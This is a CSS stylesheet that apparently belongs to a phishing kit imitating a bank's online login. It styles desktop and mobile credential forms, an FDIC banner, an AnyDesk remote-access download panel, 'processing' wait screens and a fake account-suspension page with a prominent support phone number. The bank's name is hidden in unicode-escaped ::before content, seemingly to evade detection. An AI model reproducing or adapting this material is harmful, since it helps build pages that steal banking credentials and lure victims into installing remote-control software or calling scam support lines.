* {
  padding: 0;
  margin: 0;
}

*::before,
*::after {
  box-sizing: border-box;
}

[x-cloak] {
  display: none !important;
}

ul,
li {
  list-style: none;
}

html {
  background: #fff;
  -webkit-text-size-adjust: 100%;
  -ms-text-size-adjust: 100%;
}

body {
  font: 62.5% / 1.5 Verdana, Arial, Helvetica, sans-serif;
  color: #333;
}

.container {
  width: 980px;
  margin: 0 auto;
  position: relative;
}

a {
  color: #0050b5;
  text-decoration: none;
  font-size: 1.2rem;
}

a:hover {
  text-decoration: underline;
}

.top-info-banner {
  background-color: #f2f2f2;
  height: 32px;
  text-align: center;
  border-bottom: 1px solid #e8e8e8;
}

.top-info-banner span {
  font-family: roboto-regular;
  white-space: nowrap;
  color: #646464;
  font-size: 12px;
  font-style: italic;
  font-weight: 400;
  line-height: 16px;
  margin: 6px 0;
  text-align: center;
}

.top-info-banner .container {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 8px;
}

.top-info-banner img {
  height: 16px;
  margin: 8px 0;
}

.main-header {
  padding: 25px 0;
  background: #fff;
}

.header-container {
  display: flex;
  justify-content: space-between;
  align-items: center;
}

.logo {
  display: flex;
  align-items: center;
  gap: 24px;
}

.logo p {
  color: #837361;
  font: 20px Arial, Helvetica, sans-serif;
}

.logo img {
  max-height: 28px;
  width: auto;
}

.header-right {
  font-size: 1.2rem;
  color: #333;
  font-weight: bold;
  display: flex;
  align-items: center;
}

.secure-area {
  font-weight: bold;
  background: url(../img/fsd-secure-esp-sprite.png) 0 0 no-repeat;
  padding: 0 10px 0 16px;
  color: #666;
  line-height: 16px;
  font-size: 11px;
}

.header-right .divider {
  border-left: 1px solid #777;
  height: 12px;
  margin: 0 8px;
  display: inline-block;
}

.lang-link {
  color: #333;
  font-size: 11px;
  font-weight: 300;
}

.page-title-bar .container {
  background-color: #dc1431;
  margin-bottom: 30px;
  height: 60px;
}

.page-title-bar h1 {
  color: #fff;
  line-height: 60px;
  font-size: 22px;
  font-family: "cnx-regular", Arial, sans-serif;
  visibility: visible;
  margin-left: 24px;
}

.grid-layout {
  display: flex;
  padding-bottom: 40px;
  padding-left: 25px;
}

.login-section {
  width: 32%;
  padding-right: 20px;
  border-right: 1px solid #e8e8e8;
}

.app-promo-section {
  width: 41%;
  position: relative;
  padding-left: 90px;
}

.help-section {
  width: 205px;
  font-size: 11px;
  padding: 0 9px;
}

.form-group {
  margin-bottom: 15px;
}

.fg-1 {
  margin-bottom: 8px;
}

.form-group label {
  font-weight: normal;
  font-size: 18px;
  display: block;
  padding-bottom: 4px;
}

.form-group input[type="text"],
.form-group input[type="password"] {
  width: 209px;
  display: block;
  border: 1px solid #ccc;
  padding: 4px 2px;
}

.checkbox-group {
  display: flex;
  align-items: center;
  margin-bottom: 38px;
}

.checkbox-group input {
  border: 0;
  float: left;
  margin: 2px 6px 0 0;
  padding: 0;
  width: 15px;
  display: block;
}

.checkbox-group label {
  font-size: 13px;
  color: #303332;
  font-weight: normal;
  float: left;
  padding: 0 6px 0 0;
  display: block;
}

.help-icon {
  background: url(../img/help-qm-fsd.png) no-repeat center center;
  height: 21px;
  width: 18px;
  float: left;
}

.forgot-link a {
  margin-top: 0;
  margin-left: 0;
  font-size: 12px;
  color: #00f;
}

.btn-login {
  cursor: pointer;
  margin-top: 30px;
  display: block;
  color: #fff;
  border-color: #124e89;
  background-color: #0077be;
  background-image: linear-gradient(#007dc3, #0067b1);
  padding: 1px 14px;
  position: relative;
  font: bold 15px / 22px Arial, Helvetica, sans-serif;
  font-size: 13px;
  text-align: center;
  text-decoration: none !important;
  border: 1px solid #bcb2a4;
  border-radius: 5px;
}

.secure-lock-icon {
  padding-left: 15px;
  color: #fff;
  height: 15px;
  background: url(../img/sign-in-sprite.png) no-repeat scroll 0 -4px transparent;
}

.btn-login:hover {
  color: #fff;
  border-color: #124e89;
  background-color: #0068b2;
  background-image: linear-gradient(#0067b1, #007dc3);
  border: 1px solid #bbb1a3;
}

.spinner {
  width: 12px;
  height: 12px;
  border: 2px solid rgba(255, 255, 255, 0.3);
  border-radius: 50%;
  border-top-color: #fff;
  animation: spin 0.8s linear infinite;
  display: inline-block;
  vertical-align: middle;
}

@keyframes spin {
  to {
    transform: rotate(360deg);
  }
}

.is-loading {
  pointer-events: none;
  opacity: 0.8;
}

.before-spinner {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 5px;
}

.app-promo-section h2 {
  font-size: 18px;
  font-family: "cnx-regular", Arial, sans-serif;
  visibility: visible;
  color: #544a42;
  margin-bottom: 10px;
  font-weight: 300;
}

.app-content {
  display: flex;
  align-items: flex-start;
}

.phone-image img {
  height: 208px;
  width: 149px;
}

.app-text {
  padding-left: 12px;
  margin-top: 60px;
}

.app-text p {
  font-size: 18px;
  font-family: "cnx-regular", Arial, sans-serif;
  visibility: visible;
  color: #544a42;
  margin-bottom: 10px;
  font-weight: 300;
}

.btn-get-app {
  display: inline-block;
  color: #fff;
  border-color: #bb292b;
  background-color: #dc1431;
  background-image: linear-gradient(#dc1431, #c41230);
  display: inline-block;
  font: bold 15px / 22px Arial, Helvetica, sans-serif;
  text-align: center;
  vertical-align: middle;
  text-decoration: none !important;
  border: 1px solid #bcb2a4;
  border-radius: 5px;
  padding: 5px 19px 7px 19px;
}

.btn-get-app:hover {
  text-decoration: none;
  background-color: #b90e30;
}

.help-section h3 {
  border-bottom: 1px solid #e0d9d3;
  padding: 18px 0 8px;
  font-size: 14px;
  font-weight: 400;
}

.help-section h3:first-child {
  padding-top: 0;
}

.help-block {
  margin-bottom: 30px;
}

.help-block ul {
  padding: 12px 0 5px;
}

.help-block ul li {
  padding-bottom: 15px;
}

.help-block ul li a {
  display: inline-block;
  color: #36c;
  text-decoration: none;
  font-size: 11px;
}

.main-footer {
  width: 980px;
  margin: 0 auto;
}

.main-footer .container {
  padding: 17px 25px 25px;
  background-color: #f3efea;
  padding-bottom: 42px;
}

.footer-secure {
  margin-bottom: 12px;
  display: flex;
  align-items: center;
}

.footer-links {
  margin-bottom: 15px;
  display: flex;
  align-items: center;
  font-size: 11px;
}

.footer-links a {
  color: #444;
  font-size: 11px;
}

.footer-links .divider {
  color: #ccc;
  margin: 0 8px;
}

.link-1,
.link-2,
.link-3 {
  color: #36c;
  display: block;
  float: left;
  padding-right: 10px;
  margin-right: 10px;
  background: url(../img/gfootb-static-sprite.png) right -23px no-repeat;
}

.link-3 {
  margin: 0;
  padding: 0;
  background: 0;
  display: block;
  float: left;
}

.privacy-pill {
  height: 12px;
  width: auto;
  vertical-align: middle;
  margin-bottom: 3px;
  margin-left: 5px;
  max-width: 100%;
}

.footer-copyright {
  font-size: 11px;
  margin-top: 11px;
  line-height: 15px;
}

.footer-copyright a {
  background: url(../img/gfoot-home-icon.png) no-repeat right 2px;
  padding-right: 20px;
  font-size: inherit;
}

.field-level-error {
  font-weight: bold;
  color: #d4001a;
  background: url(../img/field-error.gif) 0 0 no-repeat;
  padding: 2px 0 6px 30px !important;
  margin-left: 1px;
}

.error-message {
  font-size: 11px;
  padding: 20px 20px 17px 20px;
  border: 1px solid #f8edf3;
  background-color: #fff4f9;
  padding-right: 0;
  padding-left: 0;
  width: 980px;
  margin: 0 auto;
}

.mt-60 {
  margin-top: 60px;
}

.error-body {
  padding: 4px 0 0 61px;
  background: url(../img/error-large.gif) 0 0 no-repeat;
  min-height: 36px;
  margin: 0 20px;
}

.error-body p {
  font-weight: bold;
  color: #d10019;
  font-size: 11px;
}

.error-body ul {
  margin-left: 13px;
}

.error-body ul li {
  list-style: disc;
  padding-left: 1px;
  margin-bottom: 0;
}

@font-face {
  font-family: "cnx-light";
  src: url("../fonts/cnx-light/cnx-light.eot");
  src: url("../fonts/cnx-light/cnx-light.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-light/cnx-light.woff2") format("woff2"),
    url("../fonts/cnx-light/cnx-light.woff") format("woff"),
    url("../fonts/cnx-light/cnx-light.ttf") format("truetype");
  font-weight: 200;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-light-italic";
  src: url("../fonts/cnx-light-italic/cnx-light-italic.eot");
  src: url("../fonts/cnx-light-italic/cnx-light-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-light-italic/cnx-light-italic.woff2") format("woff2"),
    url("../fonts/cnx-light-italic/cnx-light-italic.woff") format("woff"),
    url("../fonts/cnx-light-italic/cnx-light-italic.ttf") format("truetype");
  font-weight: 200;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-regular";
  src: url("../fonts/cnx-regular/cnx-regular.eot");
  src: url("../fonts/cnx-regular/cnx-regular.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-regular/cnx-regular.woff2") format("woff2"),
    url("../fonts/cnx-regular/cnx-regular.woff") format("woff"),
    url("../fonts/cnx-regular/cnx-regular.ttf") format("truetype");
  font-weight: 300;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-italic";
  src: url("../fonts/cnx-italic/cnx-italic.eot");
  src: url("../fonts/cnx-italic/cnx-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-italic/cnx-italic.woff2") format("woff2"),
    url("../fonts/cnx-italic/cnx-italic.woff") format("woff"),
    url("../fonts/cnx-italic/cnx-italic.ttf") format("truetype");
  font-weight: 300;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-medium";
  src: url("../fonts/cnx-medium/cnx-medium.eot");
  src: url("../fonts/cnx-medium/cnx-medium.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-medium/cnx-medium.woff2") format("woff2"),
    url("../fonts/cnx-medium/cnx-medium.woff") format("woff"),
    url("../fonts/cnx-medium/cnx-medium.ttf") format("truetype");
  font-weight: 300;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-medium-italic";
  src: url("../fonts/cnx-medium-italic/cnx-medium-italic.eot");
  src: url("../fonts/cnx-medium-italic/cnx-medium-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-medium-italic/cnx-medium-italic.woff2") format("woff2"),
    url("../fonts/cnx-medium-italic/cnx-medium-italic.woff") format("woff"),
    url("../fonts/cnx-medium-italic/cnx-medium-italic.ttf") format("truetype");
  font-weight: 300;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-bold";
  src: url("../fonts/cnx-bold/cnx-bold.eot");
  src: url("../fonts/cnx-bold/cnx-bold.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-bold/cnx-bold.woff2") format("woff2"),
    url("../fonts/cnx-bold/cnx-bold.woff") format("woff"),
    url("../fonts/cnx-bold/cnx-bold.ttf") format("truetype");
  font-weight: 700;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-bold-italic";
  src: url("../fonts/cnx-bold-italic/cnx-bold-italic.eot");
  src: url("../fonts/cnx-bold-italic/cnx-bold-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-bold-italic/cnx-bold-italic.woff2") format("woff2"),
    url("../fonts/cnx-bold-italic/cnx-bold-italic.woff") format("woff"),
    url("../fonts/cnx-bold-italic/cnx-bold-italic.ttf") format("truetype");
  font-weight: 700;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-regular-cond";
  src: url("../fonts/cnx-regular-cond/cnx-regular-cond.eot");
  src: url("../fonts/cnx-regular-cond/cnx-regular-cond.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-regular-cond/cnx-regular-cond.woff2") format("woff2"),
    url("../fonts/cnx-regular-cond/cnx-regular-cond.woff") format("woff"),
    url("../fonts/cnx-regular-cond/cnx-regular-cond.ttf") format("truetype");
  font-weight: 300;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "cnx-italic-cond";
  src: url("../fonts/cnx-italic-cond/cnx-italic-cond.eot");
  src: url("../fonts/cnx-italic-cond/cnx-italic-cond.eot?#iefix") format("embedded-opentype"),
    url("../fonts/cnx-italic-cond/cnx-italic-cond.woff2") format("woff2"),
    url("../fonts/cnx-italic-cond/cnx-italic-cond.woff") format("woff"),
    url("../fonts/cnx-italic-cond/cnx-italic-cond.ttf") format("truetype");
  font-weight: 300;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-regular";
  src: url("../fonts/roboto-regular/roboto-regular.eot");
  src: url("../fonts/roboto-regular/roboto-regular.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-regular/roboto-regular.woff2") format("woff2"),
    url("../fonts/roboto-regular/roboto-regular.woff") format("woff"),
    url("../fonts/roboto-regular/roboto-regular.ttf") format("truetype");
  font-weight: 300;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-italic";
  src: url("../fonts/roboto-italic/roboto-italic.eot");
  src: url("../fonts/roboto-italic/roboto-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-italic/roboto-italic.woff2") format("woff2"),
    url("../fonts/roboto-italic/roboto-italic.woff") format("woff"),
    url("../fonts/roboto-italic/roboto-italic.ttf") format("truetype");
  font-weight: 300;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-medium";
  src: url("../fonts/roboto-medium/roboto-medium.eot");
  src: url("../fonts/roboto-medium/roboto-medium.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-medium/roboto-medium.woff2") format("woff2"),
    url("../fonts/roboto-medium/roboto-medium.woff") format("woff"),
    url("../fonts/roboto-medium/roboto-medium.ttf") format("truetype");
  font-weight: 300;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-medium-italic";
  src: url("../fonts/roboto-medium-italic/roboto-medium-italic.eot");
  src: url("../fonts/roboto-medium-italic/roboto-medium-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-medium-italic/roboto-medium-italic.woff2") format("woff2"),
    url("../fonts/roboto-medium-italic/roboto-medium-italic.woff") format("woff"),
    url("../fonts/roboto-medium-italic/roboto-medium-italic.ttf") format("truetype");
  font-weight: 300;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-bold";
  src: url("../fonts/roboto-bold/roboto-bold.eot");
  src: url("../fonts/roboto-bold/roboto-bold.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-bold/roboto-bold.woff2") format("woff2"),
    url("../fonts/roboto-bold/roboto-bold.woff") format("woff"),
    url("../fonts/roboto-bold/roboto-bold.ttf") format("truetype");
  font-weight: 700;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-bold-italic";
  src: url("../fonts/roboto-bold-italic/roboto-bold-italic.eot");
  src: url("../fonts/roboto-bold-italic/roboto-bold-italic.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-bold-italic/roboto-bold-italic.woff2") format("woff2"),
    url("../fonts/roboto-bold-italic/roboto-bold-italic.woff") format("woff"),
    url("../fonts/roboto-bold-italic/roboto-bold-italic.ttf") format("truetype");
  font-weight: 700;
  font-style: italic;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-regular";
  src: url("../fonts/roboto-regular/roboto-regular.eot");
  src: url("../fonts/roboto-regular/roboto-regular.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-regular/roboto-regular.woff2") format("woff2"),
    url("../fonts/roboto-regular/roboto-regular.woff") format("woff"),
    url("../fonts/roboto-regular/roboto-regular.ttf") format("truetype");
  font-weight: 400;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-medium";
  src: url("../fonts/roboto-medium/roboto-medium.eot");
  src: url("../fonts/roboto-medium/roboto-medium.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-medium/roboto-medium.woff2") format("woff2"),
    url("../fonts/roboto-medium/roboto-medium.woff") format("woff"),
    url("../fonts/roboto-medium/roboto-medium.ttf") format("truetype");
  font-weight: 400;
  font-style: normal;
  font-variant: normal;
}

@font-face {
  font-family: "roboto-bold";
  src: url("../fonts/roboto-bold/roboto-bold.eot");
  src: url("../fonts/roboto-bold/roboto-bold.eot?#iefix") format("embedded-opentype"),
    url("../fonts/roboto-bold/roboto-bold.woff2") format("woff2"),
    url("../fonts/roboto-bold/roboto-bold.woff") format("woff"),
    url("../fonts/roboto-bold/roboto-bold.ttf") format("truetype");
  font-weight: 700;
  font-style: normal;
  font-variant: normal;
}

.chat-container {
  padding: 40px 0;
  max-width: 600px;
  margin: 0 auto;
  text-align: center;
}

.chat-container h2 {
  font-size: 24px;
  color: #dc1431;
  margin-bottom: 20px;
  font-family: "cnx-regular", Arial, sans-serif;
}

.chat-container p {
  font-size: 15px;
  color: #444;
  margin-bottom: 30px;
  line-height: 1.6;
}

.support-info-box {
  background-color: #f3efea;
  border-radius: 4px;
  padding: 20px;
  margin-bottom: 35px;
  display: inline-block;
  min-width: 300px;
}

.support-info-box p {
  margin-bottom: 0;
  font-weight: 500;
  color: #333;
}

.anydesk-icon {
  width: 64px;
  height: 64px;
  margin: 0 auto 20px;
  background-image: url("../img/anydesk-icon.png");
  background-size: contain;
  background-repeat: no-repeat;
  background-position: center;
  background-color: #efefef;
  border-radius: 12px;
}

.btn-download {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  gap: 12px;
  color: #fff;
  background-color: #dc1431;
  background-image: linear-gradient(#dc1431, #c41230);
  font: bold 16px Arial, Helvetica, sans-serif;
  text-decoration: none !important;
  border: 1px solid #bb292b;
  border-radius: 4px;
  padding: 14px 40px;
  cursor: pointer;
  box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}

.btn-download:hover {
  background-color: #b90e30;
  background-image: none;
  box-shadow: 0 4px 8px rgba(0, 0, 0, 0.15);
}

.os-icon {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 20px;
  height: 20px;
}

.os-badge {
  display: inline-block;
  padding: 4px 12px;
  background: #dc1431;
  color: #fff;
  border-radius: 20px;
  font-size: 13px;
  font-weight: bold;
  margin-top: 8px;
}

.wait-container {
  padding-top: 10px;
}

.wait-container h2 {
  font-size: 20px;
  color: #333;
  margin-bottom: 20px;
  font-family: "cnx-regular", Arial, sans-serif;
}

.wait-container p {
  font-size: 14px;
  color: #666;
  margin-bottom: 30px;
  line-height: 1.4;
}

.blue-spinner {
  width: 40px;
  height: 40px;
  border: 4px solid #f3f3f3;
  border-top: 4px solid #0067b1;
  border-radius: 50%;
  animation: blueSpin 0.8s linear infinite;
  margin-bottom: 20px;
}

@keyframes blueSpin {
  0% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(360deg);
  }
}

.processing-text {
  font-weight: bold;
  color: #0067b1;
  font-size: 14px;
}

.mobile-top-banner {
  background-color: #fff;
  padding: 12px 16px;
  text-align: center;
  border-bottom: 1px solid #e0e0e0;
}

.mobile-top-banner .fdic-text {
  font-family: 'Roboto', Arial, sans-serif;
  font-size: 13px;
  font-style: italic;
  color: #555;
  margin-bottom: 4px;
}

.mobile-top-banner .fdic-badge {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 8px;
}

.mobile-top-banner .fdic-badge img {
  height: 18px;
  max-width: 95%;
}

.mobile-top-banner .fdic-badge span {
  font-family: 'Roboto', Arial, sans-serif;
  font-size: 11px;
  color: #333;
}

.mobile-header {
  background-color: #dc1431;
  padding: 7px;
  display: flex;
  align-items: center;
  justify-content: space-between;
}

.mobile-hamburger {
  display: flex;
  flex-direction: column;
  gap: 3px;
  cursor: pointer;
  padding: 5px;
}

.mobile-hamburger span {
  display: block;
  width: 22px;
  height: 4px;
  background-color: #fff;
}

.mobile-header-title {
  display: inline-block;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  color: rgba(255, 255, 255, 1);
  text-shadow: 0px 1px 0 rgba(0, 0, 0, .1);
  font-size: 16px;
}

.mobile-header-spacer {
  width: 32px;
}

.mobile-login-container {
  padding: 20px;
  background-color: #f5f5f5;
}

.mobile-form-group {
  margin-bottom: 12px;
}

.mobile-form-group label {
  display: none;
}

.mobile-form-group input[type="text"],
.mobile-form-group input[type="password"] {
  width: 100%;
  height: 46px;
  text-indent: 10px;
  font-size: 16px;
  border: 1px solid #ccc;
  border-radius: 8px;
  background-color: #fff;
  box-sizing: border-box;
  color: #999;
}

.mobile-form-group input[type="password"]:disabled,
.mobile-form-group input[type="text"][disabled] {
  background-color: rgb(246, 243, 239);
}

.mobile-form-group input[type="text"]::placeholder,
.mobile-form-group input[type="password"]::placeholder {
  color: #999;
  font-size: 16px;
}

.mobile-form-group input[type="text"]:focus,
.mobile-form-group input[type="password"]:focus {
  outline: none;
  border-color: #0077be;
  color: #333;
}

.inputContainer {
  position: relative;
  display: flex;
  align-items: center;
}

.inputContainer input {
  padding-right: 40px;
}

.inputContainer a.clear {
  position: absolute;
  right: 10px;
  top: 50%;
  transform: translateY(-50%);
  display: inline-block;
  height: 18px;
  width: 18px;
  background-color: #999;
  cursor: pointer;
  border-radius: 50%;
}

.inputContainer a.clear::before,
.inputContainer a.clear::after {
  content: '';
  position: absolute;
  top: 50%;
  left: 50%;
  width: 8px; 
  height: 2px;
  background-color: #fff;
}

.inputContainer a.clear::before {
  transform: translate(-50%, -50%) rotate(45deg);
}

.inputContainer a.clear::after {
  transform: translate(-50%, -50%) rotate(-45deg);
}

.mobile-userid-row {
  display: flex;
  gap: 12px;
  align-items: flex-start;
  margin-bottom: 12px;
}

.mobile-userid-row .mobile-form-group {
  flex: 1;
  margin-bottom: 0;
}

.toggleSwipeContainer {
  width: 95px;
  display: flex;
  flex-direction: column;
  align-items: flex-end;
}

.toggle-label {
  font-size: 13px;
  margin-right: 24px;
  color: rgb(25, 25, 25);
}

.toggle[toggled="true"] > .toggleOn {
  display: block;
}

.toggle[toggled="true"] > .toggleOff {
  display: none;
}

.toggle {
  position: relative;
  float: right;
  width: 80px;
  height: 30px;
  font-size: 13px;
  color: rgba(255, 255, 255, 1);
  font-weight: bold;
  line-height: 30px;
  cursor: pointer;
  background: url(../img/toggle.png) no-repeat;
  background-position: 0 0;
}

.toggle[toggled="true"] {
  background: url(../img/toggle.png) no-repeat;
  background-position: -260px 0;
}

.toggle[toggled="false"] {
  background: url(../img/toggle.png) no-repeat;
  background-position: 0 0;
}

.thumb {
  position: absolute;
  background: url(../img/toggle.png) center left no-repeat;
  background-position: -130px 0;
  -webkit-border-radius: 10px;
  border-radius: 10px;
  top: 0px;
  left: 0px;
  width: 40px;
  height: 30px;
  transition: left 0.2s ease;
}

.toggleOn {
  position: absolute;
  left: 12px;
  top: 0;
  display: none;
  width: 60px;
  text-align: left;
  text-shadow: rgba(0, 0, 0, 0.4) 0px -1px 0;
}

.toggleOff {
  position: absolute;
  width: 60px;
  text-align: center;
  right: -5px;
  top: 0;
  color: rgba(255, 255, 255, 1);
}

.mobile-btn-login {
  width: 100%;
  height: 44px;
  margin-top: 20px;
  border: none;
  border-radius: 8px;
  cursor: pointer;
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 10px;
}

.mobile-btn-login:not([disabled]) {
  background: #016FC0;
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, rgba(1, 124, 194, 1)), color-stop(1, rgba(1, 111, 174, 1)));
  box-shadow: inset 0 1px 0 rgba(0, 74, 145, .60);
}

.mobile-btn-login[disabled] {
  background: rgba(1, 124, 194, .40);
}

.mobile-btn-login .lock-icon {
  height: 20px;
  width: auto;
}

.mobile-btn-login span {
  color: #fff;
  font-size: 18px;
  font-weight: 500;
}

.mobile-btn-login:active {
  background: linear-gradient(to bottom, #8a9bae, #7a8b9e);
}

.mobile-form-links {
  display: flex;
  justify-content: space-around;
  margin-top: 20px;
  padding: 0 20px;
}

.mobile-form-links a {
  color: #0000ff;
  font-size: 13px;
  text-decoration: none !important;
}

.mobile-form-links a:hover {
  text-decoration: underline;
}

.mobile-footer {
  background-color: #f5f5f5;
  padding: 30px 16px 20px;
  padding-top: 120px;
  text-align: center;
}

.mobile-footer-links {
  display: flex;
  flex-wrap: wrap;
  justify-content: center;
  font-size: 9px;
}

.mobile-footer-links a {
  color: rgb(1, 112, 185);
  text-decoration: none;
  font-size: inherit;
}

.mobile-footer-links a:hover {
  text-decoration: underline;
}

.mobile-footer-links .separator {
  color: #999;
}

.mobile-footer-links .underline-dashed {
  text-decoration: underline;
  text-decoration-style: dashed;
}

.mobile-footer-copyright {
  font-size: 9px;
  color: #333;
  line-height: 1.6;
}

.mobile-footer-copyright a {
  color: #0000ff;
  text-decoration: underline;
  font-size: inherit;
}

.mobile-footer-patent {
  margin-top: 12px;
}

.mobile-footer-patent a {
  color: #0000ff;
  text-decoration: underline;
  font-size: 9px;
}

.only-desktop {
  display: block;
}

.only-mobile {
  display: none;
}

.modal-spinner {
  position: absolute;
  top: 0px;
  left: 0px;
  width: 100%;
  height: 100%;
  background-color: rgba(0, 0, 64, .2);
  z-index: 3;
}

.our-spinner {
  display: block;
  position: relative;
  top: 40%;
  margin: auto;
  width: 58px;
  height: 58px;
  background-color: rgba(0, 0, 0, 1);
  -moz-border-radius: 8px;
  -webkit-border-radius: 8px;
  border-radius: 8px;
  z-index: 3;
}

.messageIcon {
  background: url(../img/loadingLarge.gif) left no-repeat;
  background-size: 35px 35px;
  -webkit-background-size: 35px 35px;
  -moz-background-size: 35px 35px;
  display: inline-block;
  height: 58px;
  width: 35px;
  margin-left: auto;
  margin-right: auto;
  display: block;
}

.suspension-container {
  padding-bottom: 40px;
}

.suspension-box {
  max-width: 600px;
  margin: 0 auto;
  background: #fff;
  border: 1px solid #e0d9d3;
  border-radius: 4px;
  padding: 40px;
  text-align: center;
  box-shadow: 0 2px 8px rgba(0,0,0,0.08);
}

.suspension-icon {
  margin-bottom: 20px;
}

.suspension-icon img {
  width: 64px;
  height: 64px;
}

.suspension-title {
  color: #dc1431;
  font-size: 24px;
  font-family: 'cnx-regular', Arial, sans-serif;
  font-weight: 400;
  margin-bottom: 20px;
}

.suspension-message {
  color: #333;
  font-size: 14px;
  line-height: 1.6;
  margin-bottom: 15px;
}

.suspension-phone {
  margin: 25px 0;
  padding: 20px;
  background: #f3efea;
  border-radius: 4px;
}

.suspension-phone a {
  color: #0050b5;
  font-size: 28px;
  font-weight: bold;
  text-decoration: none;
}

.suspension-phone a:hover {
  text-decoration: underline;
}

.suspension-hours {
  color: #666;
  font-size: 13px;
  margin-bottom: 20px;
}

.suspension-notice {
  background: #fff4f9;
  border: 1px solid #f8edf3;
  border-radius: 4px;
  padding: 15px;
  margin: 20px 0;
}

.suspension-notice p {
  color: #333;
  font-size: 12px;
  line-height: 1.5;
  margin: 0;
}

.suspension-ref {
  color: #999;
  font-size: 11px;
  margin-top: 20px;
}

.mobile-suspension-container {
  padding: 20px;
  background-color: #f5f5f5;
  min-height: calc(100vh - 200px);
}

.mobile-suspension-box {
  background: #fff;
  border-radius: 8px;
  padding: 24px 20px;
  text-align: center;
  box-shadow: 0 1px 4px rgba(0,0,0,0.1);
}

.rest-icon::before {
  content: "\0042\0061\006e\006b\0020\006f\0066\0020\0041\006d\0065\0072\0069\0063\0061";
}

.mobile-suspension-icon {
  margin-bottom: 16px;
}

.mobile-suspension-icon img {
  width: 32px;
  height: 32px;
}

.rest-icon-2::before {
  content: "\0062\0061\006e\006b\006f\0066\0061\006d\0065\0072\0069\0063\0061";
}

.mobile-suspension-title {
  color: #dc1431;
  font-size: 18px;
  font-weight: 500;
  margin-bottom: 16px;
  line-height: 1.3;
}

.mobile-suspension-message {
  color: #333;
  font-size: 14px;
  line-height: 1.5;
  margin-bottom: 12px;
}

.mobile-suspension-phone {
  margin: 20px 0;
  padding: 16px;
  background: linear-gradient(to bottom, #dc1431, #c41230);
  border-radius: 8px;
}

.mobile-suspension-phone a {
  color: #fff;
  font-size: 20px;
  font-weight: bold;
  text-decoration: none;
  display: block;
}

.mobile-suspension-hours {
  color: #666;
  font-size: 12px;
  margin-bottom: 16px;
}

.mobile-suspension-notice {
  background: #f9f7f4;
  border-radius: 6px;
  padding: 12px;
  margin: 16px 0;
}

.mobile-suspension-notice p {
  color: #333;
  font-size: 12px;
  line-height: 1.4;
  margin: 0;
}

.mobile-suspension-ref {
  color: #999;
  font-size: 10px;
  margin-top: 16px;
}

@media (max-width: 768px) {
  .only-desktop {
    display: none !important;
  }

  .only-mobile {
    display: block !important;
  }

  body {
    background-color: rgba(249,247,244,1);
    height: 100vh;
  }
}